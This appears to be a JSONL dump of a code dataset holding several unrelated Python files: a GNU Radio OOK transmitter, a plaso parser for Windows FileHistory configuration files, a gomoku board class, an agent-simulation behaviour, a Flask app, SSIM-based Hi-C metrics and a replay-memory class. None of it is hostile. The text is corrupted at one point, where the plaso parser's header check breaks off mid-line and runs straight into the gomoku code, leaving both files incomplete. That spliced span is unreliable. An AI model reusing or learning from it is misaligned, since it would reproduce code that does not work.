epy_block_0.blk(scale=1, sps=sps)\n self.blocks_vector_source_x_0 = blocks.vector_source_b(list(ord(i) for i in payload), True, 1, [])\n self.blocks_packed_to_unpacked_xx_0 = blocks.packed_to_unpacked_bb(1, gr.GR_MSB_FIRST)\n self.blocks_float_to_complex_0 = blocks.float_to_complex(1)\n self.analog_const_source_x_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, 0)\n\n\n\n ##################################################\n # Connections\n ##################################################\n self.connect((self.analog_const_source_x_0, 0), (self.blocks_float_to_complex_0, 1))\n self.connect((self.blocks_float_to_complex_0, 0), (self.rational_resampler_xxx_0, 0))\n self.connect((self.blocks_packed_to_unpacked_xx_0, 0), (self.epy_block_0, 0))\n self.connect((self.blocks_vector_source_x_0, 0), (self.blocks_packed_to_unpacked_xx_0, 0))\n self.connect((self.epy_block_0, 0), (self.root_raised_cosine_filter_0, 0))\n self.connect((self.rational_resampler_xxx_0, 0), (self.limesdr_sink_0, 0))\n self.connect((self.root_raised_cosine_filter_0, 0), (self.blocks_float_to_complex_0, 0))\n self.connect((self.root_raised_cosine_filter_0, 0), (self.qtgui_freq_sink_x_0, 0))\n self.connect((self.root_raised_cosine_filter_0, 0), (self.qtgui_time_sink_x_0, 0))\n\n\n def closeEvent(self, event):\n self.settings = Qt.QSettings(\"GNU Radio\", \"ook_tx\")\n self.settings.setValue(\"geometry\", self.saveGeometry())\n self.stop()\n self.wait()\n\n event.accept()\n\n def get_sps(self):\n return self.sps\n\n def set_sps(self, sps):\n self.sps = sps\n self.set_samp_rate(self.sps*self.baud)\n self.epy_block_0.sps = self.sps\n self.root_raised_cosine_filter_0.set_taps(firdes.root_raised_cosine(1, self.samp_rate, self.baud, 0.35, 11*self.sps))\n\n def get_baud(self):\n return self.baud\n\n def set_baud(self, baud):\n self.baud = baud\n self.set_samp_rate(self.sps*self.baud)\n self.root_raised_cosine_filter_0.set_taps(firdes.root_raised_cosine(1, self.samp_rate, self.baud, 0.35, 11*self.sps))\n\n def get_upsamp(self):\n return self.upsamp\n\n def set_upsamp(self, upsamp):\n self.upsamp = upsamp\n self.limesdr_sink_0.set_digital_filter(self.samp_rate*self.upsamp, 0)\n\n def get_samp_rate(self):\n return self.samp_rate\n\n def set_samp_rate(self, samp_rate):\n self.samp_rate = samp_rate\n self.limesdr_sink_0.set_digital_filter(self.samp_rate*self.upsamp, 0)\n self.limesdr_sink_0.set_digital_filter(self.samp_rate, 1)\n self.qtgui_freq_sink_x_0.set_frequency_range(0, self.samp_rate)\n self.qtgui_time_sink_x_0.set_samp_rate(self.samp_rate)\n 
self.root_raised_cosine_filter_0.set_taps(firdes.root_raised_cosine(1, self.samp_rate, self.baud, 0.35, 11*self.sps))\n\n def get_payload(self):\n return self.payload\n\n def set_payload(self, payload):\n self.payload = payload\n self.blocks_vector_source_x_0.set_data(list(ord(i) for i in self.payload), [])\n\n\n\n\ndef main(top_block_cls=ook_tx, options=None):\n\n if StrictVersion(\"4.5.0\") <= StrictVersion(Qt.qVersion()) < StrictVersion(\"5.0.0\"):\n style = gr.prefs().get_string('qtgui', 'style', 'raster')\n Qt.QApplication.setGraphicsSystem(style)\n qapp = Qt.QApplication(sys.argv)\n\n tb = top_block_cls()\n\n tb.start()\n\n tb.show()\n\n def sig_handler(sig=None, frame=None):\n tb.stop()\n tb.wait()\n\n Qt.QApplication.quit()\n\n signal.signal(signal.SIGINT, sig_handler)\n signal.signal(signal.SIGTERM, sig_handler)\n\n timer = Qt.QTimer()\n timer.start(500)\n timer.timeout.connect(lambda: None)\n\n qapp.exec_()\n\nif __name__ == '__main__':\n main()\n","sub_path":"ook_tx/ook_tx.py","file_name":"ook_tx.py","file_ext":"py","file_size_in_byte":11540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"381257538","text":"# -*- coding: utf-8 -*-\r\n\"\"\"Parser for the FileHistory Config.xml files.\"\"\"\r\n\r\nfrom __future__ import unicode_literals\r\n\r\nimport os\r\n\r\nfrom defusedxml import ElementTree\r\nfrom dfdatetime import java_time as dfdatetime_java_time\r\n\r\nfrom plaso.containers import events\r\nfrom plaso.containers import time_events\r\nfrom plaso.lib import errors\r\nfrom plaso.lib import definitions\r\nfrom plaso.parsers import interface\r\nfrom plaso.parsers import manager\r\n\r\nclass FileHistoryConfigEventData(events.EventData):\r\n \"\"\"Windows FileHistory event data.\r\n\r\n Attributes:\r\n user_name (str)\r\n friendly_name (str)\r\n pc_name (str)\r\n library (str)\r\n user_folder (str)\r\n folder_exclude (str)\r\n retention_policy (str)\r\n minimum_retention_age (str)\r\n dp_frequency (str)\r\n dp_status (str)\r\n target_name (str)\r\n target_url (str)\r\n target_volume_path (str)\r\n target_backup_store_path (str)\r\n \"\"\"\r\n\r\n DATA_TYPE = 'filehistory:config:event'\r\n\r\n def __init__(self):\r\n \"\"\"Initializes event data.\"\"\"\r\n super(FileHistoryConfigEventData, self).__init__(data_type=self.DATA_TYPE)\r\n self.user_name = ''\r\n self.friendly_name = ''\r\n self.pc_name = ''\r\n self.library = ''\r\n self.user_folder = ''\r\n self.folder_exclude = ''\r\n self.retention_policy = ''\r\n self.minimum_retention_age = ''\r\n self.dp_frequency = ''\r\n self.dp_status = ''\r\n self.target_name = ''\r\n self.target_url = ''\r\n self.target_volume_path = ''\r\n self.target_drive_type = ''\r\n self.target_backup_store_path = ''\r\n\r\nclass FileHistoryConfigParser(interface.FileObjectParser):\r\n \"\"\"Parses an Windows FileHistory Config.xml file-like object\"\"\"\r\n\r\n NAME = 'filehistory_config'\r\n DESCRIPTION = 'Parser for Windows filehistory Config.xml files.'\r\n\r\n _HEADER_READ_SIZE = 128\r\n\r\n def ParseFileObject(self, parser_mediator, file_object):\r\n \"\"\"Parses an Windows FileHistory Config file-like object.\r\n\r\n Args:\r\n parser_mediator (ParserMediator): mediates interactions between parsers\r\n and other components, such as storage and dfvfs.\r\n file_object (dfvfs.FileIO): file-like object.\r\n\r\n Raises:\r\n unableToParseFile: when the file cannot be parsed.\r\n \"\"\"\r\n data = file_object.read(self._HEADER_READ_SIZE)\r\n if not data.startswith(b'self.n-1) or (t_y < 0 or t_y 
>self.n-1):\n break\n\n print(t_x,t_y)\n if self[t_y][t_x] == color:\n count += 1\n else:\n break\n if count >= 5:\n return True\n count = 0\n return False\n\n def get_legal_moves(self):\n \"\"\"Returns all the legal moves where no dol is on\n (1 for white, -1 for black\n \"\"\"\n moves = set() # stores the legal moves.\n newmoves = []\n # Get all the squares with pieces of the given color.\n for x in range(self.n):\n for y in range(self.n):\n if self[x][y]==0:\n newmoves.append((x,y))\n \n moves.update(newmoves)\n return list(moves)\n\n def get_legal_movesBoard(self):\n # return list\n legalBoard = [None]*self.n\n for i in range(self.n):\n legalBoard[i] = [0]*self.n\n for y in range(self.n):\n for x in range(self.n):\n if self.pieces[y][x] == 0:\n legalBoard[y][x] = 1\n else:\n legalBoard[y][x] = 0\n\n legalBoard[self.n/2][self.n/2] = 0\n return legalBoard\n\n\n def execute_move(self, move, color):\n \"\"\"Perform the given move on the board; put player's color dol \n on the move (1=white,-1=black)\n \"\"\"\n self.convert_to_Board_Pos(move,color)\n \n def convert_to_Board_Pos(self,move,color):\n bum =((self.n*self.n)*(self.n*self.n-1))/2\n allCases = [0]*bum\n allCases[move] = color\n \n self.sub_convert_to_Board(allCases[move],move,self.pieces)\n \n\n\n def convert_to_Board(self,allCases):\n \"\"\"\n convert a allCases array in to board form list\n \"\"\"\n board = [None]*self.n\n for i in range(self.n):\n board[i] = [0]*self.n\n\n caseNum = ((self.n*self.n)*(self.n*self.n-1))/2\n \n\n for c in range(caseNum):\n if allCases[c] != 0:\n self.sub_convert_to_Board(allCases[c],c,board)\n\n board[self.n/2][self.n/2] = 0 #9,9 black initial dol\n return board\n\n def sub_convert_to_Board(self,player,c,board):\n\n boardSize = self.n**2-1\n count = 0\n accum = 0\n for j in range(boardSize-count,0,-1):\n count+=1 \n accum += j\n if c < accum:\n #first digit can be defined\n # print(\"wow\")\n count-=1\n accum-=1\n board[count/self.n][count%self.n] = player\n accum = boardSize+1-accum+c\n count = 0\n\n for y in range(self.n):\n for x in range(self.n):\n count+=1\n if count == accum:\n board[y][x] = player\n return \n\n\n\n @staticmethod\n def _increment_move(move, direction, n): \n # print(move)\n \"\"\" Generator expression for incrementing moves \"\"\"\n move = list(map(sum, zip(move, direction)))\n #move = (move[0]+direction[0], move[1]+direction[1])\n while all(map(lambda x: 0 <= x < n, move)): \n #while 0<=move[0] and move[0] None:\n \"\"\"\n Implement the setup.\n :return: None\n \"\"\"\n self._replay_logger = ReplayLogger()\n\n environment = self.context.environment\n mapping = AddressMapping(\n self._mapping_path,\n environment.nb_agents\n )\n mapping.load()\n environment.set_mapping(mapping)\n\n def act(self) -> None:\n \"\"\"\n Implement the act. 
Actions depending on the phase of the simulation\n (can add a time constraint).\n\n :return: None\n \"\"\"\n environment = cast(Environment, self.context.environment)\n\n if environment.phase.value == Phase.START_SIMULATION.value:\n # Set up simulation logging\n self._replay_logger.initialize(environment.state)\n # Log initial state\n self._replay_logger.log_state(environment.state)\n environment.phase = Phase.START_NEXT_SIMULATION_TURN\n\n elif environment.phase.value == Phase.START_NEXT_SIMULATION_TURN.value:\n self._send_tick_messages(environment)\n self.context.logger.info(\"tick messages sent, waiting for replies\")\n environment.phase = Phase.COLLECTING_AGENTS_REPLY\n\n elif environment.phase.value == Phase.COLLECTING_AGENTS_REPLY.value:\n if environment.agents_reply_received:\n environment.phase = Phase.AGENTS_REPLY_RECEIVED\n\n environment.phase = Phase.START_NEXT_SIMULATION_TURN\n environment.update_simulation()\n self._replay_logger.log_state(environment.state)\n if len(environment.agents_alive) == 0 or environment.turn_number > self._max_turns:\n environment.phase = Phase.SIMULATION_CANCELLED\n else:\n environment.phase = Phase.START_NEXT_SIMULATION_TURN\n\n elif environment.phase.value == Phase.SIMULATION_CANCELLED.value:\n # the simulation has been canceled\n environment.end_simulation()\n self._cancel_simulation(environment)\n return None\n else:\n return None\n\n def teardown(self) -> None:\n \"\"\"\n Implement the task teardown.\n\n :return: None\n \"\"\"\n self._replay_logger.close()\n\n def _cancel_simulation(self, environment: Environment) -> None:\n if self.context.is_active:\n self.context.is_active = False\n Path(\"$SIMULATION_ENDED\").touch()\n\n def _send_tick_messages(self, environment: Environment) -> None:\n \"\"\"Collects data from the env and sends tick messages to all agents alive for current turn of simulation.\"\"\"\n if environment.agents_alive != [None]:\n self._send_to_all_agents(environment)\n else:\n self.context.logger.info(\n \"Tick messages not sent, list of agents alive is: '{}'\".format(environment.agents_alive))\n\n def _send_to_all_agents(self, environment):\n turn_number = environment.turn_number\n self.context.logger.info(\"Sending tick messages for turn number: '{}'\".format(turn_number))\n agent_environment_dialogues = cast(AgentEnvironmentDialogues, self.context.agent_environment_dialogues)\n\n for agent_address in environment.agents_alive:\n tile_water = environment.water_content(agent_address)\n agent_water = environment.agent_water(agent_address)\n n, e, s, w = environment.neighbours_nesw(agent_address)\n agent_movement = environment.agent_movement(agent_address)\n\n tick_msg, _agent_environment_dialogue = agent_environment_dialogues.create(\n counterparty=agent_address,\n performative=AgentEnvironmentMessage.Performative.TICK,\n tile_water=tile_water,\n turn_number=turn_number,\n agent_water=agent_water,\n north_neighbour_id=n if n else \"None\",\n east_neighbour_id=e if e else \"None\",\n south_neighbour_id=s if s else \"None\",\n west_neighbour_id=w if w else \"None\",\n movement_last_turn=agent_movement if agent_movement else \"None\"\n )\n self.context.outbox.put_message(message=tick_msg)\n","sub_path":"env_aea/skills/env_action_each_turn/behaviours.py","file_name":"behaviours.py","file_ext":"py","file_size_in_byte":6217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"172808122","text":"from flask import Flask, render_template, request\nfrom main import SentimentAnalysis\nfrom 
form import getData\nimport os\n\napp = Flask(__name__)\nSECRET_KEY = os.urandom(32)\napp.config['SECRET_KEY'] = SECRET_KEY\nsa=SentimentAnalysis()\n\n@app.route('/')\ndef index():\n form=getData()\n return render_template('m.html',form=form)\n\n@app.route('/submit', methods = ['GET', 'POST'])\ndef submit():\n if request.method == 'POST':\n #Parse form data \n getData.topic = request.form['topic']\n getData.count = request.form['count']\n sa.DownloadData()\n return render_template('m.html')\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"113656278","text":"from PIL import Image\nimport numpy as np\nimport sys\nimport os\nimport csv\nimport random\n\nlabels = {}\ncount = 0\noutput = [\"train.csv\", \"test.csv\"]\nfor root, dirs, files in os.walk(\"pic\", topdown=False):\n labels[root] = count\n \n for name in files:\n if(name.endswith('.jpg')):\n fileName = os.path.join(root, name)\n else:\n continue\n img_file = Image.open(fileName)\n\n width, height = img_file.size\n format = img_file.format\n mode = img_file.mode\n\n img_grey = img_file.convert('L')\n\n value = np.asarray(img_grey.getdata(), dtype=np.int).reshape((img_grey.size[1], img_grey.size[0]))\n value = value.flatten()\n value = np.insert(value, 0, count)\n with open(random.choice(output), 'a') as f:\n writer = csv.writer(f)\n writer.writerow(value)\n\n count += 1\n\nprint (labels)","sub_path":"transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"267534045","text":"import sqlite3\nfrom abc import ABCMeta, abstractmethod\nfrom enum import Enum\nfrom pickle import dumps, loads\nfrom tempfile import NamedTemporaryFile\nfrom typing import Callable, Generic, Optional, TypeVar, Union, cast\nfrom uuid import uuid4\n\nT = TypeVar(\"T\")\nKT = TypeVar(\"KT\")\nVT = TypeVar(\"VT\")\n_T = TypeVar(\"_T\")\n_S = TypeVar(\"_S\")\n\n\nclass RebuildStrategy(Enum):\n CHECK_WITH_FIRST_ELEMENT = 1\n ALWAYS = 2\n SKIP = 3\n\n\nclass SqliteCollectionBase(Generic[T], metaclass=ABCMeta):\n def __init__(\n self,\n connection: Optional[Union[str, sqlite3.Connection]] = None,\n table_name: Optional[str] = None,\n serializer: Optional[Callable[[T], bytes]] = None,\n deserializer: Optional[Callable[[bytes], T]] = None,\n persist: bool = True,\n rebuild_strategy: RebuildStrategy = RebuildStrategy.CHECK_WITH_FIRST_ELEMENT,\n do_initialize: bool = True,\n ):\n super(SqliteCollectionBase, self).__init__()\n self._serializer = cast(Callable[[T], bytes], dumps) if serializer is None else serializer\n self._deserializer = cast(Callable[[bytes], T], loads) if deserializer is None else deserializer\n self._persist = persist\n self._rebuild_strategy = rebuild_strategy\n if connection is None:\n self._connection = sqlite3.connect(NamedTemporaryFile().name)\n elif isinstance(connection, str):\n self._connection = sqlite3.connect(connection)\n elif isinstance(connection, sqlite3.Connection):\n self._connection = connection\n else:\n raise TypeError(\n f\"connection argument must be None or a string or a sqlite3.Connection, not '{type(connection)}'\"\n )\n self._table_name = (\n f\"{self.container_type_name}_{str(uuid4()).replace('-', '')}\" if table_name is None else table_name\n )\n if do_initialize:\n self._initialize(commit=True)\n\n def 
__del__(self) -> None:\n if not self.persist:\n cur = self.connection.cursor()\n cur.execute(\n \"DELETE FROM metadata WHERE table_name=? AND container_type=?\",\n (self.table_name, self.container_type_name),\n )\n cur.execute(f\"DROP TABLE {self.table_name}\")\n self.connection.commit()\n\n def _initialize(self, commit: bool = False) -> None:\n self._initialize_metadata_table(commit=commit)\n self._initialize_table(commit=commit)\n if self._should_rebuild():\n self._do_rebuild(commit=commit)\n\n def _should_rebuild(self) -> bool:\n if self.rebuild_strategy == RebuildStrategy.ALWAYS:\n return True\n if self.rebuild_strategy == RebuildStrategy.SKIP:\n return False\n return self._rebuild_check_with_first_element()\n\n @abstractmethod\n def _rebuild_check_with_first_element(self) -> bool:\n ...\n\n @abstractmethod\n def _do_rebuild(self, commit: bool = False) -> None:\n ...\n\n @property\n def rebuild_strategy(self) -> RebuildStrategy:\n return self._rebuild_strategy\n\n @property\n def persist(self) -> bool:\n return self._persist\n\n @property\n def serializer(self) -> Callable[[T], bytes]:\n return self._serializer\n\n def serialize(self, x: T) -> bytes:\n return self.serializer(x)\n\n @property\n def deserializer(self) -> Callable[[bytes], T]:\n return self._deserializer\n\n def deserialize(self, blob: bytes) -> T:\n return self.deserializer(blob)\n\n @property\n def table_name(self) -> str:\n return \"\".join(c for c in self._table_name if c.isalnum() or c == \"_\")\n\n @property\n def connection(self) -> sqlite3.Connection:\n return self._connection\n\n @property\n def container_type_name(self) -> str:\n return self.__class__.__name__\n\n @property\n @abstractmethod\n def schema_version(self) -> str:\n ...\n\n def _is_table_initialized(self) -> bool:\n try:\n cur = self._connection.cursor()\n cur.execute(\n \"SELECT schema_version FROM metadata WHERE table_name=? 
AND container_type=?\",\n (self.table_name, self.container_type_name),\n )\n buf = cur.fetchone()\n if buf is None:\n return False\n version = buf[0]\n if version != self.schema_version:\n return False\n cur.execute(f\"SELECT 1 FROM {self.table_name}\")\n return True\n except sqlite3.OperationalError as _:\n pass\n return False\n\n def _do_tidy_table_metadata(self, commit: bool = False) -> None:\n cur = self.connection.cursor()\n cur.execute(\n \"INSERT INTO metadata (table_name, schema_version, container_type) VALUES (?, ?, ?)\",\n (self.table_name, self.schema_version, self.container_type_name),\n )\n if commit:\n self.connection.commit()\n\n def _initialize_table(self, commit: bool = False) -> None:\n if not self._is_table_initialized():\n self._do_create_table()\n self._do_tidy_table_metadata()\n if commit:\n self.connection.commit()\n\n @abstractmethod\n def _do_create_table(self, commit: bool = False) -> None:\n ...\n\n def _is_metadata_table_initialized(self) -> bool:\n try:\n cur = self.connection.cursor()\n cur.execute(\"SELECT 1 FROM metadata\")\n return True\n except sqlite3.OperationalError as _:\n pass\n return False\n\n def _do_initialize_metadata_table(self, commit: bool = False) -> None:\n cur = self.connection.cursor()\n cur.execute(\n \"\"\"\n CREATE TABLE metadata (\n table_name TEXT PRIMARY KEY,\n schema_version TEXT NOT NULL,\n container_type TEXT NOT NULL,\n UNIQUE (table_name, container_type)\n )\n \"\"\"\n )\n if commit:\n self.connection.commit()\n\n def _initialize_metadata_table(self, commit: bool = False) -> None:\n if not self._is_metadata_table_initialized():\n self._do_initialize_metadata_table(commit)\n","sub_path":"sqlitecollections/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"363055493","text":"#the implementation of SSIM in this file is pulled from DeepHiC https://github.com/omegahh/DeepHiC\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom math import exp\nimport numpy as np\nfrom Models.VEHiCLE_Module import GAN_Model\nfrom scipy.stats import pearsonr\nfrom scipy.stats import spearmanr\nimport argparse\nimport sys\nsys.path.append(\".\")\nsys.path.append(\"../\")\nimport numpy as np\nfrom sklearn.decomposition import PCA\nimport glob\nimport yaml\nimport matplotlib.pyplot as plt\nimport torch\nimport pdb\nfrom pytorch_lightning import Trainer\nfrom Data.GM12878_DataModule import GM12878Module\nfrom Data.K562_DataModule import K562Module\n\nclass SSIM(nn.Module):\n def __init__(self, window_size=11, size_average=True):\n super(SSIM, self).__init__()\n self.window_size = window_size\n self.size_average = size_average\n self.channel = 1\n self.window = self.create_window(window_size, self.channel)\n\n def _toimg(self, mat):\n m = torch.tensor(mat)\n # convert to float and add channel dimension\n return m.float().unsqueeze(0)\n\n def _tohic(self, mat):\n mat.squeeze_()\n return mat.numpy()#.astype(int)\n\n def gaussian(self, width, sigma):\n gauss = torch.Tensor([exp(-(x-width//2)**2 / float(2 * sigma**2)) for x in range(width)])\n return gauss / gauss.sum()\n\n def create_window(self, window_size, channel, sigma=3):\n _1D_window = self.gaussian(window_size, sigma).unsqueeze(1)\n _2D_window = _1D_window.mm(_1D_window.t()).float().unsqueeze(0).unsqueeze(0)\n window = _2D_window.expand(channel, 1, window_size, window_size).contiguous()\n return window\n\n def gaussian_filter(self, img, 
width, sigma=3):\n        img = self._toimg(img).unsqueeze(0)\n        _, channel, _, _ = img.size()\n        window = self.create_window(width, channel, sigma)\n        mu1 = F.conv2d(img, window, padding=width // 2, groups=channel)\n        return self._tohic(mu1)\n\n    def _ssim(self, img1, img2, window, window_size, channel, size_average=True):\n        mu1 = F.conv2d(img1, window, padding=window_size // 2, groups=channel)\n        mu2 = F.conv2d(img2, window, padding=window_size // 2, groups=channel)\n\n        mu1_sq = mu1.pow(2)\n        mu2_sq = mu2.pow(2)\n        mu1_mu2 = mu1 * mu2\n\n        sigma1_sq = F.conv2d(img1 * img1, window, padding=window_size // 2, groups=channel) - mu1_sq\n        sigma2_sq = F.conv2d(img2 * img2, window, padding=window_size // 2, groups=channel) - mu2_sq\n        sigma12 = F.conv2d(img1 * img2, window, padding=window_size // 2, groups=channel) - mu1_mu2\n\n        C1 = 0.01 ** 2\n        C2 = 0.03 ** 2\n\n        ssim_map = ((2 * mu1_mu2 + C1) * (2 * sigma12 + C2)) / ((mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2))\n\n        if size_average:\n            return ssim_map.mean()\n        else:\n            return ssim_map.mean(1).mean(1).mean(1)\n\n\n    def ssim(self, img1, img2, window_size=11, size_average=True):\n        img1 = self._toimg(img1).unsqueeze(0)\n        img2 = self._toimg(img2).unsqueeze(0)\n        _, channel, _, _ = img1.size()\n        window = self.create_window(window_size, channel)\n        window = window.type_as(img1)\n\n        return self._ssim(img1, img2, window, window_size, channel, size_average)\n\n\n\n    def forward(self, img1, img2):\n        (_, channel, _, _) = img1.size()\n\n        if channel == self.channel and self.window.data.type() == img1.data.type():\n            window = self.window\n        else:\n            window = self.create_window(self.window_size, channel)\n\n            if img1.is_cuda:\n                window = window.cuda(img1.get_device())\n            window = window.type_as(img1)\n\n            self.window = window\n            self.channel = channel\n\n        return self._ssim(img1, img2, window, self.window_size, channel, self.size_average)\n\n\n\nclass VisionMetrics:\n    def __init__(self):\n        self.ssim = SSIM()\n        self.metric_logs = {\n            \"pre_pcc\":[],\n            \"pas_pcc\":[],\n            \"pre_spc\":[],\n            \"pas_spc\":[],\n            \"pre_psnr\":[],\n            \"pas_psnr\":[],\n            \"pre_ssim\":[],\n            \"pas_ssim\":[],\n            \"pre_mse\":[],\n            \"pas_mse\":[],\n            \"pre_snr\":[],\n            \"pas_snr\":[]\n        }\n\n\n    def _logSSIM(self, data, target, output):\n        self.metric_logs['pre_ssim'].append(self.compareSSIM(data, target))\n        self.metric_logs['pas_ssim'].append(self.compareSSIM(output, target))\n\n    def _logPSNR(self, data, target, output):\n        self.metric_logs['pre_psnr'].append(self.comparePSNR(data, target))\n        self.metric_logs['pas_psnr'].append(self.comparePSNR(output, target))\n\n    def _logPCC(self, data, target, output):\n        self.metric_logs['pre_pcc'].append(self.comparePCC(data, target))\n        self.metric_logs['pas_pcc'].append(self.comparePCC(output, target))\n\n    def _logSPC(self, data, target, output):\n        self.metric_logs['pre_spc'].append(self.compareSPC(data, target))\n        self.metric_logs['pas_spc'].append(self.compareSPC(output, target))\n\n    def _logMSE(self, data, target, output):\n        self.metric_logs['pre_mse'].append(self.compareMSE(data, target))\n        self.metric_logs['pas_mse'].append(self.compareMSE(output, target))\n\n    def _logSNR(self, data, target, output):\n        self.metric_logs['pre_snr'].append(self.compareSNR(data, target))\n        self.metric_logs['pas_snr'].append(self.compareSNR(output, target))\n\n    def compareSPC(self, a, b):\n        return spearmanr(a[0][0], b[0][0], axis=None)[0]\n\n    def comparePCC(self, a, b):\n        return pearsonr(a[0][0].flatten(), b[0][0].flatten())[0]\n\n    def comparePSNR(self, a, b):\n        MSE = np.square(a[0][0]-b[0][0]).mean().item()\n        MAX = 
torch.max(b).item()\n return 20*np.log10(MAX) - 10*np.log10(MSE)\n\n def compareSNR(self, a, b):\n return torch.sum(b[0][0]).item()/torch.sqrt(torch.sum((b[0][0]-a[0][0])**2)).item()\n\n def compareSSIM(self, a, b):\n return self.ssim(a, b).item()\n\n def compareMSE(self, a, b):\n return np.square(a[0][0]-b[0][0]).mean().item()\n\n def log_means(self, name):\n return (name, np.mean(self.metric_logs[name]))\n\n def setDataset(self, chro, res=10000, piece_size=269, cell_line=\"GM12878\"):\n if cell_line == \"GM12878\":\n self.dm_test = GM12878Module(batch_size=1, res=res, piece_size=piece_size)\n if cell_line == \"K562\":\n self.dm_test = K562Module(batch_size=1, res=res, piece_size=piece_size)\n self.dm_test.prepare_data()\n self.dm_test.setup(stage=chro)\n\n def getMetrics(self, model, spliter):\n self.metric_logs = {\n \"pre_pcc\":[],\n \"pas_pcc\":[],\n \"pre_spc\":[],\n \"pas_spc\":[],\n \"pre_psnr\":[],\n \"pas_psnr\":[],\n \"pre_ssim\":[],\n \"pas_ssim\":[],\n \"pre_mse\":[],\n \"pas_mse\":[],\n \"pre_snr\":[],\n \"pas_snr\":[]\n }\n\n for e, epoch in enumerate(self.dm_test.test_dataloader()):\n print(str(e)+\"/\"+str(self.dm_test.test_dataloader().dataset.data.shape[0]))\n data, full_target, info = epoch\n target = full_target[:,:,6:-6,6:-6]\n filter_data = data[:,:,6:-6,6:-6]\n if spliter == \"vehicle\" or spliter == \"large\": #no need to seperate pieces\n output = model(data).detach()\n\n if spliter == \"hicplus\" or spliter == \"hicsr\": #separater into 40x40 windows\n output = torch.zeros((1,1,269,269))\n for i in range(0, 269-40, 28):\n for j in range(0,269-40,28):\n temp = data[:,:,i:i+40, j:j+40]\n output[:,:,i+6:i+34, j+6:j+34] = model(temp)\n output = output[:,:,6:-6,6:-6].detach()\n \n if spliter == \"deephic\" or spliter=='vae':\n output = torch.zeros((1,1,269,269))\n for i in range(0, 269-40, 28):\n for j in range(0,269-40,28):\n temp = data[:,:,i:i+40, j:j+40]\n output[:,:,i+6:i+34, j+6:j+34] = model(temp)[:,:,6:-6,6:-6]\n output = output[:,:,6:-6,6:-6].detach()\n\n if spliter == \"large_deephic\":\n output = model(data).detach()[:,:,6:-6,6:-6]\n\n\n self._logPCC(data=filter_data, target=target, output=output)\n self._logSPC(data=filter_data, target=target, output=output)\n self._logMSE(data=filter_data, target=target, output=output)\n self._logPSNR(data=filter_data, target=target, output=output)\n self._logSNR(data=filter_data, target=target, output=output)\n self._logSSIM(data=filter_data, target=target, output=output)\n print(list(map(self.log_means, self.metric_logs.keys())))\n return self.metric_logs\n\nif __name__=='__main__':\n visionMetrics = VisionMetrics()\n visionMetrics.setDataset(20, cell_line=\"K562\")\n WEIGHT_PATH = \"deepchromap_weights.ckpt\"\n model = GAN_Model()\n pretrained_model = model.load_from_checkpoint(WEIGHT_PATH)\n pretrained_model.freeze()\n visionMetrics.getMetrics(model=pretrained_model, spliter=False)\n","sub_path":"Utils/vision_metrics.py","file_name":"vision_metrics.py","file_ext":"py","file_size_in_byte":9328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"85043590","text":"import random\nfrom collections import deque\nimport math\nfrom operator import itemgetter\nimport numpy as np\n\n\nclass Memory:\n '''\n Memory storage of observed states. 
This includes basic functionality\n to retrieve a sample from memory in a random fashion, as well as more\n advanced memory prioritisation techniques such as memory prioritisation.\n\n '''\n\n def __init__( self, hyper_params):\n self.hp = hyper_params\n\n self.memory_sort_interval=2000\n\n # when beta in mem prior should be at minimal value\n self.mem_prior_beta_anneal_max=200000\n\n self.memory = deque( )\n\n if self.hp.USE_MEM_PRIOR:\n self._init_rank_distributions( )\n\n def store( self, td_error, last_action, reward, st_0, st_1, term_state ):\n # store the transition in memory\n self.memory.append( [ td_error, st_0, last_action, reward, st_1, term_state ] )\n\n if len( self.memory ) > self.hp.MEM_SIZE:\n self.memory.popleft( )\n\n def get_sample( self, step ):\n if self.hp.USE_MEM_PRIOR:\n if step % self.memory_sort_interval == 0:\n self._sort_memory( )\n mini_batch, mini_batch_idx, wIs = self._get_rank_prioritisation_sample( step )\n else:\n wIs = None\n mini_batch, mini_batch_idx = self._get_random_sample( )\n return mini_batch, mini_batch_idx, wIs\n\n def update_td_errors( self, mini_batch_idx, td_error_batch, td_error_idx ):\n if self.hp.USE_MEM_PRIOR:\n # RANK BASED\n for cc in range( self.hp.BATCH_SIZE ):\n self.memory[ mini_batch_idx[ cc ] ][ td_error_idx ] = math.fabs( td_error_batch[ cc ] )\n\n def _init_rank_distributions( self ):\n # Cache partition indices for several values of N as alpha is static\n self.alpha = 0.7\n self.beta_zero = 0.5\n self.num_partitions = 100 # must be at least 1/100 of memory size\n self.partition_division = int( np.floor( float( self.hp.MEM_SIZE ) / self.num_partitions ) )\n self.distribution_list = [ ]\n\n for n in range( self.partition_division, self.hp.MEM_SIZE + self.partition_division, self.partition_division ):\n # Create power law PDF\n distribution_pdf = np.power( np.linspace( 1, n, n ), -self.alpha )\n pdf_sum = np.sum( distribution_pdf )\n distribution_pdf /= pdf_sum # Normalise PDF, so probability is 1.0\n # Create CDF\n cdf = np.cumsum( distribution_pdf )\n\n # Set up strata for stratified sampling (transitions will have varying TD-error magnitudes delta)\n distribution_strata_ends = np.zeros( self.hp.BATCH_SIZE + 1 )\n distribution_strata_ends[ 0 ] = 0 # First index is 0 (+1)\n distribution_strata_ends[ self.hp.BATCH_SIZE ] = n - 1 # Last index is n\n\n # Use linear search to find strata indices\n stratum_end = 1.0 / self.hp.BATCH_SIZE\n index = 0\n for s in range( 1, self.hp.BATCH_SIZE ):\n index += 1\n while cdf[ index ] < stratum_end:\n index += 1\n distribution_strata_ends[ s ] = index # Save index\n stratum_end += 1.0 / self.hp.BATCH_SIZE # Set condition for next stratum\n\n # Store distribution\n self.distribution_list.append( (distribution_pdf, 